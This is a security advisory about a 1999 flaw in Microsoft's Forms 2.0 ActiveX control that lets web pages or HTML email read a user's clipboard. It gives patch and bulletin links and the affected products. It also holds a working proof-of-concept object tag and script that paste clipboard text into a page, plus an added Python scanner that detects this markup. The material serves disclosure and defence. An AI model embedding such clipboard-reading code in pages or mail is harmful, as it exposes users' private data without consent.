Forms 2.0 is an ActiveX control that is distributed with any application that includes Visual Basic for Applications 5.0. This ActiveX control enables a malicious user to gain access to information stored in the clipboard.
Credit:
The vulnerability was found by: Juan Carlos Garcia Cuartango.
Cuartango is known for discovering previous copy & paste bugs in Internet Explorer:
The Cuartango security hole
Another Cuartango security hole
A patch for this security hole can be found at Microsoft:
http://officeupdate.microsoft.com/downloaditems/fm2paste.exe
To test whether you are vulnerable or not go to Cuartango's home page:
http://pages.whowhere.com/computers/cuartangojc/clipboard2.html
Microsoft's Security bulletin about this security hole can be found at:
http://www.microsoft.com/security/bulletins/ms99-001.asp.
The Forms 2.0 ActiveX control allows text to be pasted from a user's Clipboard into a 'Forms 2.0' Text Box or Combo Box. This control is typically installed with the applications listed in the "Affected Products" section below.
A malicious user could use the Forms 2.0 Control to read or export text on a user's Clipboard when that user visits a hostile web site or opens a malicious HTML formatted email.
The Forms 2.0 Security Patch prevents a malicious user from exploiting this vulnerability. Those who install the patch will not lose functionality and will still have the ability to manually paste content from their Clipboard to a 'Forms 2.0' Text Box or Combo Box. Developers who have built Visual Basic for Applications solutions using the Forms 2.0 Control will still be able to paste into Text Boxes and Combo Boxes.
While there have not been any reports of customers being adversely affected by these problems, Microsoft is releasing a patch to address any risks posed by this issue.
Affected Software Versions
The following software installs the Forms 2.0 control:
- Microsoft Office 97
- Microsoft Outlook 98
- Microsoft Project 98
- Microsoft Visual Basic 5.0
- Any third party product that includes Visual Basic for Applications 5.0
To determine whether you need to download and install the security fix, right-click the Fm20.dll file in your \Windows\System folder and choose Properties from the shortcut menu. If the file date of your FM20.dll file is earlier than January 11, 1999 (1/11/99), you should download and install the security fix.
A script that makes the content of the clipboard public is very simple:
First, insert a Forms 2.0 ActiveX object into an HTML page:
<object id="tb" classid="clsid:8BD21D10-EC42-11CE-9E0D-00AA006002F3" width="169" height="23">
<param name="VariousPropertyBits" value="2894088219">
<param name="BackColor" value="16776960">
<param name="Size" value="4480;600">
<param name="FontHeight" value="200">
<param name="FontCharSet" value="0">
<param name="FontPitchAndFamily" value="2">
</object>
Then insert the following script to copy the content of the clipboard into the ActiveX control:
function GetClipBoard()
{
    // paste over the Microsoft Forms 2.0 TextBox
    tb.paste();
    // moves the text to the text area box
    document.forms(0).S1.value=tb.text;
    if(document.forms(0).S1.value == "")
        alert("Your browser does not have the security hole or your clipboard was empty ");
    else
        alert("Clipboard security hole in browser -- " + navigator.userAgent );
}
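For unpatched machines, a mail or proxy content filter can flag this markup before it reaches the browser. The following is an added example, not part of the original advisory or Microsoft's bulletin: it looks for an `<object>` carrying the Forms 2.0 classid shown above and for script that calls `paste()` on that object's id. The names `Forms20Scanner` and `scan_html`, the verdict strings and the sample documents are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# classid of the Forms 2.0 control, taken from the <object> tag on this page.
FORMS20_CLASSID = "clsid:8bd21d10-ec42-11ce-9e0d-00aa006002f3"

class Forms20Scanner(HTMLParser):
    """Collects ids of embedded Forms 2.0 objects and all script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.script_text, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "object" and attrs.get("classid", "").strip().lower() == FORMS20_CLASSID:
            self.object_ids.append(attrs.get("id", ""))
        if tag == "script":
            self._in_script = True
        # Inline handlers (onload=, onclick=, ...) can call paste() as well.
        self.script_text += [v for k, v in attrs.items() if k.startswith("on")]

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)

def scan_html(html):
    """Return a verdict plus the object ids that script calls .paste() on."""
    scanner = Forms20Scanner()
    scanner.feed(html)
    scanner.close()
    code = "\n".join(scanner.script_text)
    pasting = [i for i in scanner.object_ids
               if i and re.search(r"\b" + re.escape(i) + r"\s*\.\s*paste\s*\(", code, re.I)]
    verdict = ("clipboard-read" if pasting
               else "forms20-embedded" if scanner.object_ids else "clean")
    return {"verdict": verdict, "object_ids": scanner.object_ids, "pasting_ids": pasting}

# Constructed samples (not captured traffic); the first mirrors the page's markup.
HOSTILE = ('<object id="tb" classid="clsid:8BD21D10-EC42-11CE-9E0D-00AA006002F3"></object>'
           '<script>function GetClipBoard(){ tb.paste(); }</script>')
EMBED_ONLY = '<object id="box" classid="CLSID:8bd21d10-ec42-11ce-9e0d-00aa006002f3"></object>'
CLEAN = '<object id="tb" classid="clsid:00000000-0000-0000-0000-000000000000"></object><script>tb.paste();</script>'

if __name__ == "__main__":
    for name, doc in (("hostile", HOSTILE), ("embed-only", EMBED_ONLY), ("clean", CLEAN)):
        print(name, scan_html(doc))
```

A "forms20-embedded" verdict is worth reviewing on its own, since the control has little reason to appear in web pages or HTML mail from untrusted senders.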